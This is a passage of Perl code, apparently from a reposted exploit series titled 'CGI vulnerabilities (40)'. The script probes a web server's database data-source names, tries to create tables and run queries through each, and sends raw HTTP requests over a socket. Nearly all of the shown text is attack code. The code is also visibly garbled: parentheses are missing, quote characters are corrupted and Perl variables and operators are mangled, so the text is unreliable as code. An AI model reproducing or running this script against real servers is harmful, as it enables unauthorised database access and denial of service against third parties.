|
CGI漏洞(40) while(<IN>{
$hold=$_; $hold=~s/[\r\n]//g; $dSn="$hold"; print ".";
next if (!is_access("DSN=$dSn");
if(create_table("DSN=$dSn"){
print "$dSn successful\n";
if(run_query("DSN=$dSn"){
print "Success!\n"; save (3,3,"DSN=$dSn",""; exit; } else {
print "Something‘s borked. Use verbose next time\n";}}}
print "\n"; close(IN);} ############################################################################## sub sendraw2 { # ripped and modded from whisker
sleep($delay); # it‘s a DoS on the server! At least on mine...
my ($pstr)=@_;
socket(S,PF_INET,SOCK_STREAM,getprotobyname(‘tcp‘)0)
die("Socket problems\n";
if(connect(S,pack "SnA4x8",2,80,$target)){
print "Connected. Getting data";
open(OUT,">raw.out"; my @in;
select(S); $=1; print $pstr;
while((S)){ print OUT $_; push @in, $_; print STDOUT ".";}
close(OUT); select(STDOUT); close(S); return @in;
} else { die("Can‘t connect...\n"; }} ############################################################################## sub content_start { # this will take in the server headers
my (@in)=@_; my $c;
for ($c=1;$c<500;$c++) {
if($in[$c] =~/^\x0d\x0a/){
if ($in[$c+1]=~/^HTTP\/1.[01] [12]00/) { $c++; }
else { return $c+1; }}}
return -1;} # it should never get here actually ############################################################################## sub funky {
| 
